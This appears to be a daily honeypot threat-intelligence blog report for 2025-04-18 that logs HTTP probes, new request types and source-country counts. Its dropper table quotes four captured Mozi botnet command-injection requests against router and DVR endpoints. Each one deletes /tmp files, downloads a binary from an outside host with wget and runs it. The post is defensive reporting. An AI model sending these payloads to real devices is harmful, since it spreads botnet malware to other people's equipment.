Skip to main content
  1. Daily-Posts/

Report: 2025-04-18

·482 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-04-18
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 4 stage 1 IP address(es), linked to 4 dropper URL(s).

There are 39 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1606 requests were recorded during the day, originating from 4 different countries, with a peak of 392 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USDubai
CNGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
14.102.189.16527;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
139.5.0.142GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
103.206.103.184GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.206.103.184:59799/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
103.199.180.230GET /shell?cd+/tmp;rm+-rf+*;wget+http://103.199.180.230:45172/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
1063GET /.well-known/agent.json HTTP/1.1
2321GET /config/index?time=1744967097027290096 HTTP/1.1
2331GET /config/index?time=1744965374806952242 HTTP/1.1
2341POST /api/user/binLookup?time=1744962468230666878 HTTP/1.1
3061\x12\x01\x00^\x00\x00\x01\x00\x00\x00$\x00\x06\x01\x00*\x00\x01\x02\x00+\x00\x01\x03\x00,\x00\x04\x04\x000\x00\x01\x05\x001\x00$\x06\x00U\x00\x01\xFF\x04\x07\x0C\xBC\x00\x00\x00\x00\x00\x00\x15\xD0\x00\xAF/\xA3h\xF6\x7F\x00\x00\x90\xF4\xBF\xA4p\x00\x00\x00\xE0\x81\xC8h\xF6\x7F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01
3071\x00\x0E8F;\xFB\x8D\xAE\x8C\xCD\x9B\x00\x00\x00\x00\x00
3491POST /api/user/binLookup?time=1744969052257386757 HTTP/1.1
3501GET /api/bin/440393?time=1744969051662221363 HTTP/1.1
3511GET /config/index?time=1744967880456244302 HTTP/1.1
3521GET /config/index?time=1744965641481793503 HTTP/1.1
3561POST /api/user/binLookup?time=1744961909479266222 HTTP/1.1
3571GET /api/bin/440393?time=1744961908962995955 HTTP/1.1
3611POST /api/user/binLookup?time=1744954258804599153 HTTP/1.1
3621GET /api/bin/440393?time=1744954258277572194 HTTP/1.1
3701POST /api/user/binLookup?time=1744989300926169472 HTTP/1.1
3711GET /api/bin/440393?time=1744989300414924616 HTTP/1.1
3721GET /config/index?time=1744988199768680375 HTTP/1.1
3771POST /api/user/binLookup?time=1744983103817730368 HTTP/1.1
3781GET /api/bin/440393?time=1744983103303579949 HTTP/1.1
3791GET /config/index?time=1744979531930928544 HTTP/1.1
3801GET /NmapUpperCheck1744989965 HTTP/1.1
3931GET /blIE HTTP/1.1
3941GET /nmaplowercheck1744989965 HTTP/1.1
4081GET /Nmap/folder/check1744989965 HTTP/1.1
4791POST /api/user/binLookup?time=1744968039523618468 HTTP/1.1
4801GET /api/bin/440393?time=1744968038864619656 HTTP/1.1
4811GET /config/index?time=1744967148178360507 HTTP/1.1
4821GET /config/index?time=1744965446957789924 HTTP/1.1
4831POST /api/user/binLookup?time=1744962780805968376 HTTP/1.1
4841GET /api/bin/440393?time=1744962780410449261 HTTP/1.1
4851GET /api/bin/440393?time=1744954989337907718 HTTP/1.1
4951POST /api/user/binLookup?time=1744989013066329965 HTTP/1.1
4961GET /api/bin/440393?time=1744989012643577876 HTTP/1.1
4981GET /config/index?time=1744987813205266966 HTTP/1.1
5001POST /api/user/binLookup?time=1744980935211061485 HTTP/1.1
5011GET /api/bin/440393?time=1744980934804354971 HTTP/1.1
5021POST /api/user/binLookup?time=1744967966225311071 HTTP/1.1
5031GET /api/bin/440393?time=1744967965566904723 HTTP/1.1
5191GET /api/bin/440393?time=1744955638793993480 HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0392US
1199GB
2182NL
3115RU
4115CN
5112BG
697LT
776DE
871HK
955PL
1042ID
1116IN
1213UA
1313KR
1412CA
1511NO
169RO
179SC
188JP
197PT
206IT
216VN
225BE
234LA
244SG
253GH
263IL
273TH
283BR
292AO
302FR
312AZ
322AU
331CH
341PE
351AR
361EC
371GE
381SE
391TR

Related

Report: 2025-04-17
·410 words
Repport Daily
Report: 2025-04-16
·4764 words
Repport Daily
Report: 2025-04-15
·378 words
Repport Daily